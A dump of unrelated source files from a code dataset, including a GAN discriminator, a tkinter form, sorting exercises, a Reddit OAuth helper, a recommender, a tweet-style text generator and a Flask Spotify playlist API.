initialW=w),\n )\n\n self.depth = depth\n\n def __call__(self, x, alpha=1.0):\n xn = add_noise(x)\n if self.depth > 0 and alpha < 1:\n h1 = self['b%d'%(7-self.depth)](xn, True)\n x2 = F.average_pooling_2d(xn, (2, 1), (2, 1))\n h2 = F.leaky_relu(self['b%d'%(7-self.depth+1)].c0_0(x2))\n h = h2 * (1 - alpha) + h1 * alpha\n else:\n h = self['b%d'%(7-self.depth)](xn, True)\n\n for i in range(self.depth):\n h = self['b%d'%(7-self.depth+1+i)](h)\n\n h = F.sigmoid(self.l0(h))\n h = F.flatten(h)\n return h\n\n\nclass PosewiseDiscriminator(chainer.Chain):\n def __init__(self, wscale=0.02):\n w = chainer.initializers.Normal(wscale)\n super(PosewiseDiscriminator, self).__init__()\n with self.init_scope():\n self.c0 = conv_Layer(1, 64, ksize=(1, 3), stride=(1, 3), pad=(0, 1), normalize=True)\n self.c1 = conv_Layer(64, 64, ksize=(1, 32), stride=(1, 1), pad=(0, 0), normalize=True)\n self.c2 = conv_Layer(64, 1, ksize=(1, 1), stride=(1, 1), pad=(0, 0), normalize=True)\n #self.stddev = MinibatchStddev(1)\n\n def __call__(self, x):\n xp = cuda.get_array_module(x.data)\n h = add_noise(x)\n h = F.leaky_relu(self.c0(h))\n h = F.leaky_relu(self.c1(h))\n h = F.leaky_relu(self.c2(h))\n h = F.sigmoid(h)\n h = F.flatten(h)\n return h\n\n\nclass MinibatchStddev(chainer.Link):\n def __init__(self, ch):\n super(MinibatchStddev, self).__init__()\n\n self.eps = 1.0\n\n def __call__(self, x):\n mean = F.mean(x, axis=0, keepdims=True)\n dev = x - F.broadcast_to(mean, x.shape)\n devdev = dev * dev\n var = F.mean(devdev, axis=0, keepdims=True) # using variance instead of stddev\n # stddev = my_sqrt(var + self.eps)\n # stddev_mean = F.mean(stddev)\n stddev_mean = F.mean(var)\n new_channel = F.broadcast_to(stddev_mean, (x.shape[0], 1, x.shape[2], x.shape[3]))\n h = F.concat((x, new_channel), axis=1)\n return 
h\n","sub_path":"core/models/net4.py","file_name":"net4.py","file_ext":"py","file_size_in_byte":9935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227750946","text":"from tkinter import *\r\nroot= Tk()\r\nroot.geometry(\"400x300+10+10\")\r\nroot.title(\"Admission Form\")\r\nvar= IntVar()\r\n\r\nl=Label(root,text=\"Admission Form\",width=15,font=(\"Bold\",20))\r\nl.place(x=90,y=53)\r\n\r\nl1=Label(root,text=\"Enter First Name\",width=15,font=(\"Bold\",10))\r\nl1.place(x=80,y=130)\r\n\r\ne1=Entry(root)\r\ne1.place(x=240,y=130)\r\n\r\nl2=Label(root,text=\"Enter Last Name\",width=15,font=(\"Bold\",10))\r\nl2.place(x=68,y=180)\r\n\r\ne2=Entry(root)\r\ne2.place(x=240,y=180)\r\n\r\nl3=Label(root,text=\"Gender\",width=15,font=(\"Bold\",10))\r\nl3.place(x=58,y=230)\r\nRadiobutton(root,text= \"Male\",variable= var,value=1,padx=15).place(x=235,y=230)\r\nRadiobutton(root,text= \"Female\",variable= var,value=2,padx=20).place(x=300,y=230)\r\n\r\nl4=Label(root,text=\"Subject\",width=15,font=(\"Bold\",10))\r\nl4.place(x=55,y=300)\r\n\r\n#var1 = IntVar()\r\nCheckbutton(root,text=\"python\",variable=var).place(x=235,y=300)\r\n#var2 = IntVar()\r\nCheckbutton(root,text=\"java\",variable=var).place(x=315,y=300)\r\n#var3=IntVar()\r\nCheckbutton(root,text=\"C++\",variable=var).place(x=235,y=325)\r\n#var4=IntVar()\r\nCheckbutton(root,text=\"Linux\",variable=var).place(x=315,y=330)\r\nButton(root, text='Submit',width=20,bg='brown',fg='white').place(x=230,y=400)\r\n\r\nroot.mainloop()\r\n\r\n\r\n","sub_path":"AllButton(Adminssion Form).py","file_name":"AllButton(Adminssion Form).py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"319830819","text":"# TO-DO: Complete the selection_sort() function below\ndef selection_sort(arr):\n\n for i in range(0, len(arr) - 1):\n cur_index = i\n smallest_index = cur_index\n for j in range(i+1, len(arr)):\n if arr[j] < arr[i] and arr[j] < arr[smallest_index]:\n arr[cur_index], arr[j] = arr[j], arr[cur_index]\n j += 1\n\n return arr\n\n\n# print(selection_sort(arr))\n\n\n# TO-DO: implement the Bubble Sort function below\ndef bubble_sort(arr):\n arr_end = len(arr)-1\n # * Each iteration moves the largest accessible value to the end, so i=2 will move the second largest number to the second-to-last index. That means the end of the loop can decrement after each iteration.\n for i in range(0, arr_end):\n j = 0\n # * The inner loop, in turn, only needs to run while j is less than the latest 'ending' index. This keeps the loop from needing to check the entire array\n while j < arr_end:\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n j += 1\n arr_end -= 1\n i += 1\n return arr\n\n\n# STRETCH: implement the Count Sort function below\ndef count_sort(arr, maximum=-1):\n\n return arr\n","sub_path":"src/iterative_sorting/iterative_sorting.py","file_name":"iterative_sorting.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583765841","text":"import os\nimport time\nimport uuid\n\nimport praw\nfrom tornado import gen, ioloop, web, httpserver\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom . 
import config\nfrom .curses_helpers import show_notification\nfrom .helpers import check_browser_display, open_browser\n\n__all__ = ['OAuthTool']\n\noauth_state = None\noauth_code = None\noauth_error = None\n\ntemplate_path = os.path.join(os.path.dirname(__file__), 'templates')\n\n\nclass AuthHandler(web.RequestHandler):\n\n def get(self):\n global oauth_state, oauth_code, oauth_error\n\n oauth_state = self.get_argument('state', default='placeholder')\n oauth_code = self.get_argument('code', default='placeholder')\n oauth_error = self.get_argument('error', default='placeholder')\n\n self.render('index.html', state=oauth_state, code=oauth_code,\n error=oauth_error)\n\n # Stop IOLoop if using a background browser such as firefox\n if check_browser_display():\n ioloop.IOLoop.current().stop()\n\n\nclass OAuthTool(object):\n\n def __init__(self, reddit, stdscr=None, loader=None):\n\n self.reddit = reddit\n self.stdscr = stdscr\n self.loader = loader\n self.http_server = None\n\n self.refresh_token = config.load_refresh_token()\n\n # Initialize Tornado webapp\n routes = [('/', AuthHandler)]\n self.callback_app = web.Application(routes,\n template_path=template_path)\n\n self.reddit.set_oauth_app_info(config.oauth_client_id,\n config.oauth_client_secret,\n config.oauth_redirect_uri)\n\n # Reddit's mobile website works better on terminal browsers\n if not check_browser_display():\n if '.compact' not in self.reddit.config.API_PATHS['authorize']:\n self.reddit.config.API_PATHS['authorize'] += '.compact'\n\n def authorize(self):\n\n # If we already have a token, request new access credentials\n if self.refresh_token:\n with self.loader(message='Logging in'):\n self.reddit.refresh_access_information(self.refresh_token)\n return\n\n # Start the authorization callback server\n if self.http_server is None:\n self.http_server = httpserver.HTTPServer(self.callback_app)\n self.http_server.listen(config.oauth_redirect_port)\n\n hex_uuid = uuid.uuid4().hex\n authorize_url = self.reddit.get_authorize_url(\n hex_uuid, scope=config.oauth_scope, refreshable=True)\n\n # Open the browser and wait for the user to authorize the app\n if check_browser_display():\n with self.loader(message='Waiting for authorization'):\n open_browser(authorize_url)\n ioloop.IOLoop.current().start()\n else:\n with self.loader(delay=0, message='Redirecting to reddit'):\n # Provide user feedback\n time.sleep(1)\n ioloop.IOLoop.current().add_callback(self._open_authorize_url,\n authorize_url)\n ioloop.IOLoop.current().start()\n\n if oauth_error == 'access_denied':\n show_notification(self.stdscr, ['Declined access'])\n return\n elif oauth_error != 'placeholder':\n show_notification(self.stdscr, ['Authentication error'])\n return\n elif hex_uuid != oauth_state:\n # Check if UUID matches obtained state.\n # If not, authorization process is compromised.\n show_notification(self.stdscr, ['UUID mismatch'])\n return\n\n try:\n with self.loader(message='Logging in'):\n access_info = self.reddit.get_access_information(oauth_code)\n self.refresh_token = access_info['refresh_token']\n if config.persistent:\n config.save_refresh_token(access_info['refresh_token'])\n except (praw.errors.OAuthAppRequired, praw.errors.OAuthInvalidToken):\n show_notification(self.stdscr, ['Invalid OAuth data'])\n else:\n message = ['Welcome {}!'.format(self.reddit.user.name)]\n show_notification(self.stdscr, message)\n\n def clear_oauth_data(self):\n self.reddit.clear_authentication()\n config.clear_refresh_token()\n self.refresh_token = None\n\n @gen.coroutine\n def 
_open_authorize_url(self, url):\n        with ThreadPoolExecutor(max_workers=1) as executor:\n            yield executor.submit(open_browser, url)\n        ioloop.IOLoop.current().stop()\n","sub_path":"rtv/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":4641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"240479130","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 23 21:59:24 2019\r\n\r\n@author: Augustine Chukwu\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n#u_cols = ['id', 'name', 'username', 'email', 'short_bio']\r\nusers = pd.read_csv('users.csv',)\r\nprint(\"\\nUser Data :\")\r\nprint(\"shape : \", users.shape)\r\nprint(users.head())\r\n\r\nposts = pd.read_csv('posts.csv')\r\nprint(\"\\nPost Data :\")\r\nprint(\"shape :\", posts.shape)\r\nprint(posts.head())\r\n\r\nfollowing = pd.read_csv('following.csv')\r\nprint(\"\\nFollowing Data :\")\r\nprint(\"shape :\", following.shape)\r\nprint(following.head())\r\n\r\nnotifications = pd.read_csv('notifications.csv')\r\nprint(\"\\nNotifications Data :\")\r\nprint(\"shape :\", notifications.shape)\r\nprint(notifications.head())\r\n\r\nratings = pd.read_csv('rating.csv')\r\nprint(\"\\nRating Data :\")\r\nprint(\"shape :\", ratings.shape)\r\nprint(ratings.head())\r\n\r\n\r\nn_users = ratings.user_id.unique().shape[0]\r\nn_posts = ratings.post_id.unique().shape[0]\r\n\r\ndata_matrix = np.zeros((n_users, n_posts))\r\n\r\nfor line in ratings.itertuples():\r\n    data_matrix[line[1]-1, line[2]-1] = line[3]\r\n    \r\n#Calculating the similarity between the two features\r\nfrom sklearn.metrics.pairwise import pairwise_distances\r\nuser_similarity = pairwise_distances(data_matrix, metric='cosine')\r\npost_similarity = pairwise_distances(data_matrix.T, metric='cosine')\r\n#the above code gives the post similarities and user similarities in an array\r\n\r\n#making predictions based on this; we define a function\r\n#note: it must work on the matrix passed in, not the global ratings DataFrame\r\ndef predict(ratings, similarity, type='user'):\r\n    if type == 'user':\r\n        mean_user_rating = ratings.mean(axis=1)\r\n        \r\n        ratings_diff = (ratings - mean_user_rating[:, np.newaxis])\r\n        pred = mean_user_rating[:, np.newaxis] + similarity.dot(ratings_diff) / np.array([np.abs(similarity).sum(axis=1)]).T\r\n    elif type == 'post':\r\n        pred = ratings.dot(similarity) / np.array([np.abs(similarity).sum(axis=1)])\r\n    return pred\r\n#making predictions\r\nuser_predictions = predict(data_matrix, user_similarity, type='user')\r\npost_prediction = predict(data_matrix, post_similarity, type = 'post')\r\n\r\n    ","sub_path":"Recommender_System_1.py","file_name":"Recommender_System_1.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"34932822","text":"import enchant\nimport nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\n# from nltk import PorterStemmer\nimport re\n\nDictionary = enchant.Dict(\"en_US\")\n\ndef replaceTwoOrMore(s):\n    pattern = re.compile(r\"(.)\\1{1,}\", re.DOTALL)\n    return pattern.sub(r\"\\1\\1\", s)\n\ndef getFeatureVector(status):\n    featureVector = []\n    postag = nltk.pos_tag(status.split())\n    words = [x[0] for x in postag if x[1] not in [\"NN\", \"IN\", \"CC\", \"TO\", \"NNS\", \"NNP\", \"NNPS\"]]\n    for w in words:\n        w = replaceTwoOrMore(w)\n        # w = w.strip('\\'\"?,.')\n        val = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", w)\n        if(val is None):\n            continue\n        if(Dictionary.check(w) == False):\n            continue\n        else:\n            w = w.lower()\n            # w = port.stem(w).encode('ascii')\n            
# if(w in stopWords):\n # continue\n # if w in featureVector: featureVector[w] += 1\n # else: featureVector[w] = 1\n featureVector.append(w)\n return featureVector\n","sub_path":"gfv.py","file_name":"gfv.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523292189","text":"def DFS(y, x):\n global N, M, islands, island\n island.clear()\n dx = [1, 0, -1, 0]\n dy = [0, 1, 0, -1]\n stack = [(y,x)]\n fieldvisited[y][x] = 1\n island.append((y, x))\n field[y][x] = len(islands)\n while stack:\n vy, vx = stack[-1]\n for i in range(4):\n ny = vy + dy[i]\n nx = vx + dx[i]\n if 0 <= ny < N and 0 <= nx < M and field[ny][nx] > 0 and not fieldvisited[ny][nx]:\n fieldvisited[ny][nx] = 1\n island.append((ny, nx))\n stack.append((ny, nx))\n field[ny][nx] = len(islands)\n break\n else:\n stack.pop()\n islands.append(island[:])\n\ndef cases(arr, start, r):\n for i in range(start, len(arr)-r+1):\n if r == 1:\n yield [arr[i]]\n else:\n for j in cases(arr, i+1, r-1):\n yield [arr[i]] + j\n\ndef min_distance(islands, obj):\n global N, M\n returnval = 1000\n islandval = field[islands[0][0]][islands[0][1]]\n dx = [1, 0, -1, 0]\n dy = [0, 1, 0, -1]\n for island in islands:\n vy, vx = island\n for direc in range(4):\n cnt = 0\n i = j = 1\n if direc == 0 or direc == 2:\n while True:\n nx = vx + i * dx[direc]\n if nx == -1 or nx == M or field[vy][nx] == islandval:\n break\n elif field[vy][nx] > 0:\n if cnt < 2: break\n elif field[vy][nx] != obj: break\n else:\n returnval = min(returnval, cnt)\n cnt += 1\n i += 1\n elif direc == 1 or direc == 3:\n while True:\n ny = vy + j * dy[direc]\n if ny == -1 or ny == N or field[ny][vx] == islandval:\n break\n elif field[ny][vx] > 0:\n if cnt < 2: break\n elif field[ny][vx] != obj: break\n else:\n returnval = min(returnval, cnt)\n cnt += 1\n j += 1\n if returnval == 1000: return -1\n return returnval\n\ndef isvalid(arr, s, visited):\n q = [s]\n while q:\n v = q.pop(0)\n for i in range(1, len(arr)):\n if arr[v][i] and not visited[i]:\n visited[i] = 1\n q.append(i)\n for j in range(1, len(visited)):\n if not visited[j]: return False\n return True\n\ndef BT():\n result = 1000\n edges = []\n for edgecase in cases(range(1, len(islands)), 0, 2):\n edges.append(edgecase)\n # print(edges)\n for caseset in cases(edges, 0, len(islands)-2):\n arr = [[0 for i in range(len(islands))] for j in range(len(islands))]\n for case in caseset:\n s, e = case\n arr[s][e] = 1\n arr[e][s] = 1\n visited = [0 for i in range(len(islands))]\n visited[1] = 1\n if not isvalid(arr, 1, visited): continue\n\n tempval = 0\n for case in caseset:\n vidx, fidx = case # idx of island\n fval = field[islands[fidx][0][0]][islands[fidx][0][1]]\n distance = min_distance(islands[vidx], fval)\n if distance == -1: break\n else:\n tempval += distance\n if tempval >= result: break\n else:\n # print(result)\n # print(caseset)\n result = min(tempval, result)\n\n if result == 1000: return -1\n return result\n\nN, M = map(int, input().split())\nfield = [list(map(int, input().split())) for j in range(N)]\nislands = [0]\nisland = []\n\nfieldvisited = [[0 for i in range(M)] for j in range(N)]\nfor i in range(N):\n for j in range(M):\n if field[i][j] > 0 and not fieldvisited[i][j]:\n DFS(i, j)\n\n# print('======')\nprint(BT())\n# print('======')\n# BT()\n# test=[]\n# for case in cases(range(1,6), 0, 2):\n# test.append(case)\n# print(test)\n# print(min_distance(islands[3], 5))\n# for _ in range(len(field)):\n# print(field[_])\n\n# for case 
in cases([1,2,3,4,5], 0, 2):\n# print(case)","sub_path":"python/bojprobs/삼성_SW_역량테스트_기출문제/boj17472_2.py","file_name":"boj17472_2.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"21778618","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport pickle\nimport tflearn\nimport tensorflow as tf\nfrom tflearn.data_utils import *\nimport re\nfrom builtins import any as b_any\n\ntf.logging.set_verbosity(tf.logging.ERROR)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nID = \"TrumpGen_JG\"\nchar_idx_file = 'char_idx.pickle'\npath = \"./Trump_fix.txt\"\n\nmaxlen = 25\nchar_idx = None\nif os.path.isfile(char_idx_file):\n print('Loading previous char_idx')\n char_idx = pickle.load(open(char_idx_file, 'rb'))\n\nX, Y, char_idx = \\\n textfile_to_semi_redundant_sequences(\n path, seq_maxlen=maxlen, redun_step=1)\npickle.dump(char_idx, open(char_idx_file, 'wb'))\n\n# Instantiating checkpoint finder\ncheckpoint = False\nlist_of_files = os.listdir()\ncheckpoint_type = \".data-00000-of-00001\"\nif b_any(checkpoint_type in x for x in list_of_files):\n checkpoint = True\n\n def extract_number(f):\n s = re.findall(\"(\\d+).data-00000-of-00001\", f)\n return (int(s[0]) if s else -1, f)\n target = (max(list_of_files, key=extract_number))\n target = target.split('.')\n target = target[0]\n\n# Begin Main loop\nwith tf.device('/cpu:0'):\n # Launch tensorboard (This is disabled as it causes Python to crash)\n #os.spawnl(os.P_NOWAIT, \"tensorboard --logdir='/tmp/tflearn_logs/\" + ID + \"'\")\n #os.spawnl(os.P_NOWAIT, \"start \\\"\\\" http://localhost:6006\")\n # Building layers in network\n g = tflearn.input_data([None, maxlen, len(char_idx)])\n g = tflearn.lstm(g, 256, return_seq=True)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.lstm(g, 256, return_seq=True)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.lstm(g, 256)\n g = tflearn.dropout(g, 0.5)\n g = tflearn.fully_connected(g, len(char_idx), activation='softmax')\n g = tflearn.regression(g, optimizer='adam', loss='categorical_crossentropy',\n learning_rate=0.001)\n\n # stating model is to be used in tflearns sequence generator template\n m = tflearn.SequenceGenerator(g, dictionary=char_idx,\n seq_maxlen=maxlen,\n clip_gradients=5.0,\n checkpoint_path='model_trump_Gen',\n max_checkpoints=1)\n # checking if checkpoint\n if checkpoint is True:\n m.load(target)\n\n # Setting up input, with safety check to ensure atleast 25 characters\n foundit = False\n while foundit != True:\n seed = input(\"Give me a seed for the tweet (Give a phrase): \")\n if not seed:\n foundit = True\n seed = random_sequence_from_textfile(path, maxlen)\n else:\n if len(seed) < 24:\n with open(path) as f:\n for line in f:\n if seed in line:\n foundit = True\n line_hold = line.split(seed)\n line_hold = seed + line_hold[1]\n seed = line_hold\n break\n else:\n foundit = True\n if foundit == False:\n print(\"Try again\")\n if len(seed) > 25:\n seed = seed[0:25]\n\n# Create 1 tweet length message\nthe_Trump_file = open('Trumpish_Snippet.txt', 'w')\nprint('One line, coming up')\nTrumping = m.generate(280, temperature=.5,\n seq_seed=seed) # random sentence\nthe_Trump_file.write(\"\\r%s\\n\" % Trumping + '...')\n\n\n# Create 1 page paper\n# the_Trump_file_page = open('Trumpish_Page.txt', 'w')\n# print('One paper, coming up')\n# for i in range(3):\n# seed = random_sequence_from_textfile(path, maxlen)\n# Trumping = m.generate(1000, temperature=.5,\n# seq_seed=seed) # random 
sentence\n# the_Trump_file_page.write(\"\\r%s\\n\" % Trumping)\n","sub_path":"Just_Generate.py","file_name":"Just_Generate.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"18912699","text":"import argparse\nfrom trainer.util import run_optimizer_process\n\nfrom trainer.Fashion_Trainset_Worker import FashionTrainsetWorker as worker\n# from trainer.MNIST_TRAINSET import MnistTrainsetWorker as worker\n# from trainer.CIFAR_TRAINSET import CifarTrainsetWorker as worker\n\ndef main(job_dir, **args):\n job_dir += '20200412/FASHION/Trainset/'\n methods = ['bohb', 'hyperband', 'randomsearch']\n num_iterations = 5\n experiment_count = 5\n min_budget = 1/128\n max_budget = 1.0\n\n\n # min_budget = 0.0032\n # max_budget = 0.04\n # experiment_count = 1\n # methods = ['bohb']\n # num_iterations = 5\n\n eta = 3\n verbose = True\n for m in methods:\n for _ in range(experiment_count):\n temp_dir = job_dir + 'Run_' + str(_) + '/'\n res_dir = temp_dir + 'Results/'\n work_dir = temp_dir + 'Work/'\n res = run_optimizer_process(method=m,\n run_id=str(_),\n min_budget=min_budget,\n max_budget=max_budget,\n eta=eta,\n verbose=verbose,\n worker=worker,\n res_dir=res_dir + m + '/',\n work_dir=work_dir + m + '/',\n num_iterations=num_iterations)\n print ('\\n'*10)\n print (\"Method: \", m)\n print (\"Experiment Number: \", str(_))\n print ('\\n'*10)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n # Input Arguments\n parser.add_argument(\n '--job-dir',\n help='GCS location to write checkpoints and export models',\n required=True\n )\n args = parser.parse_args()\n arguments = args.__dict__\n print (arguments)\n main(**arguments)\n","sub_path":"gcp/working-gcloud/trainer/run_trainset.py","file_name":"run_trainset.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"26195415","text":"import main as main\nimport urllib3 \nimport urllib.parse as parse\nfrom flask import Flask, request, render_template, make_response, redirect\nfrom flask_cors import CORS, cross_origin\nimport uuid\nfrom cryptography.fernet import Fernet\napp = Flask(__name__)\nCORS(app, resources={r\"/login\": {\"origins\":\"*\"}}, support_credentials=True)\n\nusers = {}\nSECRET = Fernet(Fernet.generate_key())\nTESTING = False\n\n\ndef EncryptToken(string_token):\n byte_token = bytes(string_token, encoding=\"utf-8\")\n encrypted = SECRET.encrypt(byte_token)\n return encrypted\n \n \ndef DecryptToken(byte_token):\n decrypted = SECRET.decrypt(byte_token).decode('utf-8')\n return decrypted\n\n\ndef CreateSession(sid, token):\n users[sid] = EncryptToken(token)\n\n\ndef SetCookie(resp):\n resp.set_cookie(\"sid\", str(uuid.uuid1().int), httponly=True, secure=False, path=\"/\")\n return resp\n\n\ndef IsLoggedIn(request):\n sid = request.cookies.get(\"sid\")\n logged_in = sid in users.keys()\n return logged_in\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef root():\n if IsLoggedIn(request):\n return redirect(\"/dashboard\")\n else:\n return redirect(\"/login\")\n\n\n@app.route(\"/login\", methods=[\"GET\"])\ndef Login(): \n if IsLoggedIn(request):\n return redirect(\"/dashboard\")\n else:\n resp = make_response(render_template(\"login.html\"))\n SetCookie(resp)\n return resp\n \n\n@app.route(\"/dashboard\", methods=[\"GET\"])\ndef Dashboard():\n code = request.args.get(\"code\")\n sid = request.cookies.get(\"sid\")\n \n if code:\n try:\n token = 
main.GetToken(code)\n except main.spotipy.oauth2.SpotifyOauthError:\n return redirect(\"/login\")\n \n CreateSession(sid, token)\n return redirect(\"/dashboard\")\n else:\n if not IsLoggedIn(request):\n return redirect(\"/login\")\n \n \n resp = make_response(render_template(\"dashboard.html\"))\n return resp\n\n\n@app.route(\"/api/save_liked_songs\", methods=[\"GET\"])\ndef SaveLikedSongsToPlaylist():\n if not IsLoggedIn(request):\n return {\n \"status\": \"error\",\n \"description\": \"INVALID SID\"\n }\n if TESTING:\n print(\"..........SAVING LIKED SONGS TO PLAYLIST..........\")\n else:\n sid = request.cookies.get(\"sid\")\n token = DecryptToken(users[sid])\n sp = main.GetSP(token)\n main.SaveLikedSongsToPlaylist(sp)\n \n return {\"status\": \"ok\"}\n\n\n@app.route(\"/api/create_time_capsule\", methods=[\"GET\"])\ndef CreateTimeCapsule():\n if not IsLoggedIn(request):\n return {\n \"status\": \"error\",\n \"description\": \"INVALID SID\"\n }\n if TESTING:\n print(\"..........CREATING TIME CAPSULE..........\")\n else:\n sid = request.cookies.get(\"sid\")\n token = DecryptToken(users[sid])\n sp = main.GetSP(token)\n main.SavedTracksToPlaylistsByMonth(sp)\n \n return {\"status\": \"ok\"}\n\n\n@app.route(\"/api/save_discover_weekly\", methods=[\"GET\"])\ndef SaveDiscoverWeekly():\n if not IsLoggedIn(request):\n return {\n \"status\": \"error\",\n \"description\": \"INVALID SID\",\n \"error\": \"invalid_sid\"\n }\n if TESTING:\n print(\"..........SAVING DISCOVER WEEKLY..........\")\n resp = {\"status\": \"ok\"}\n return resp\n else:\n sid = request.cookies.get(\"sid\")\n token = DecryptToken(users[sid])\n sp = main.GetSP(token)\n playing_playlist = main.GetCurrentPlayingPlaylist(sp)\n if playing_playlist == None:\n resp = {\n \"status\": \"error\",\n \"description\": \"This isn't a playlist\",\n \"error\": \"not_playlist\"\n }\n return resp\n playing_playlist_name = playing_playlist[\"name\"] \n print(f\"Playlist name: {playing_playlist_name}\")\n if playing_playlist_name != \"Discover Weekly\":\n resp = {\n \"status\": \"error\",\n \"description\": \"This playlist isn't Discover Weekly!\",\n \"error\": \"not_discover_weekly\"\n }\n else: \n playlist_id = main.GetCurrentPlayingPlaylistID(sp)\n new_playlist_id = main.SaveDiscoverWeekly(sp, playlist_id)\n resp = {\n \"status\": \"ok\",\n \"playlist_url\": f\"https://open.spotify.com/playlist/{new_playlist_id}?si=8998205cd0f54cef\"\n }\n return resp\n\n\ndef TestEncrypting():\n message = \"DOGE TO THE MOON\"\n print(message)\n encrypted = EncryptToken(message)\n print(encrypted)\n print(DecryptToken(encrypted))\n\n\nif __name__ == \"__main__\":\n app.run(threaded=True, port=80)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"221812879","text":"# -*- coding: utf-8 -*-\n# Copyright 2020 The PsiZ Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"keras.layers pytest setup.\"\"\"\n\nimport numpy as np\nimport pytest\nimport tensorflow as tf\n\n\n@pytest.fixture\ndef paired_inputs_v0():\n    \"\"\"A minibatch of non-gate inputs.\"\"\"\n    # Create a simple batch (batch_size=5).\n\n    inputs_0 = tf.constant(\n        np.array(\n            [\n                [0.0, 0.1, 0.2],\n                [1.0, 1.1, 1.2],\n                [2.0, 2.1, 2.2],\n                [3.0, 3.1, 3.2],\n                [4.0, 4.1, 4.2]\n            ], dtype=np.float32\n        )\n    )\n\n    inputs_1 = tf.constant(\n        np.array(\n            [\n                [5.0, 5.1, 5.2],\n                [6.0, 6.1, 6.2],\n                [7.0, 7.1, 7.2],\n                [8.0, 8.1, 8.2],\n                [9.0, 9.1, 9.2]\n            ], dtype=np.float32\n        )\n    )\n\n    return [inputs_0, inputs_1]\n\n\n@pytest.fixture\ndef paired_inputs_v1():\n    \"\"\"A minibatch of embedding coordinate inputs.\"\"\"\n    # Create a simple batch (batch_size=5).\n\n    inputs_0 = tf.constant(\n        np.array(\n            [\n                [0.0, 0.1, 0.2],\n                [1.0, 1.1, 1.2],\n                [2.0, 2.1, 2.2],\n                [3.0, 3.1, 3.2],\n                [4.0, 4.1, 4.2]\n            ], dtype=np.float32\n        )\n    )\n\n    inputs_1 = tf.constant(\n        np.array(\n            [\n                [1.0, 1.1, 1.2],\n                [2.1, 2.2, 2.3],\n                [3.2, 3.3, 3.4],\n                [4.4, 4.3, 4.2],\n                [4.0, 4.1, 4.2]\n            ], dtype=np.float32\n        )\n    )\n\n    return [inputs_0, inputs_1]\n\n\n# TODO remove\n@pytest.fixture\ndef pw_inputs_v0():\n    \"\"\"A minibatch of non-gate inputs.\"\"\"\n    # Create a simple batch (batch_size=5).\n\n    inputs_0 = tf.constant(\n        np.array(\n            [\n                [0.0, 0.1, 0.2],\n                [1.0, 1.1, 1.2],\n                [2.0, 2.1, 2.2],\n                [3.0, 3.1, 3.2],\n                [4.0, 4.1, 4.2]\n            ], dtype=np.float32\n        )\n    )\n\n    inputs_1 = tf.constant(\n        np.array(\n            [\n                [5.0, 5.1, 5.2],\n                [6.0, 6.1, 6.2],\n                [7.0, 7.1, 7.2],\n                [8.0, 8.1, 8.2],\n                [9.0, 9.1, 9.2]\n            ], dtype=np.float32\n        )\n    )\n\n    inputs = tf.stack([inputs_0, inputs_1], axis=-1)\n    return inputs\n\n\n@pytest.fixture\ndef pw_inputs_v1():\n    \"\"\"A minibatch of non-gate inputs.\"\"\"\n    # Create a simple batch (batch_size=5).\n\n    inputs_0 = tf.constant(\n        np.array(\n            [\n                [0.0, 0.1, 0.2],\n                [1.0, 1.1, 1.2],\n                [2.0, 2.1, 2.2],\n                [3.0, 3.1, 3.2],\n                [4.0, 4.1, 4.2]\n            ], dtype=np.float32\n        )\n    )\n\n    inputs_1 = tf.constant(\n        np.array(\n            [\n                [5.0, 5.1, 5.2],\n                [6.0, 6.1, 6.2],\n                [7.0, 7.1, 7.2],\n                [8.0, 8.1, 8.2],\n                [9.0, 9.1, 9.2]\n            ], dtype=np.float32\n        )\n    )\n\n    inputs = tf.stack([inputs_0, inputs_1], axis=-1)\n    return inputs\n\n\n@pytest.fixture\ndef group_v0():\n    \"\"\"A minibatch of group indices.\"\"\"\n    # Create a simple batch (batch_size=5).\n    group = tf.constant(\n        np.array(\n            [\n                [0, 0, 0],\n                [0, 1, 0],\n                [0, 2, 0],\n                [0, 1, 1],\n                [0, 2, 1]\n            ], dtype=np.int32\n        )\n    )\n    return 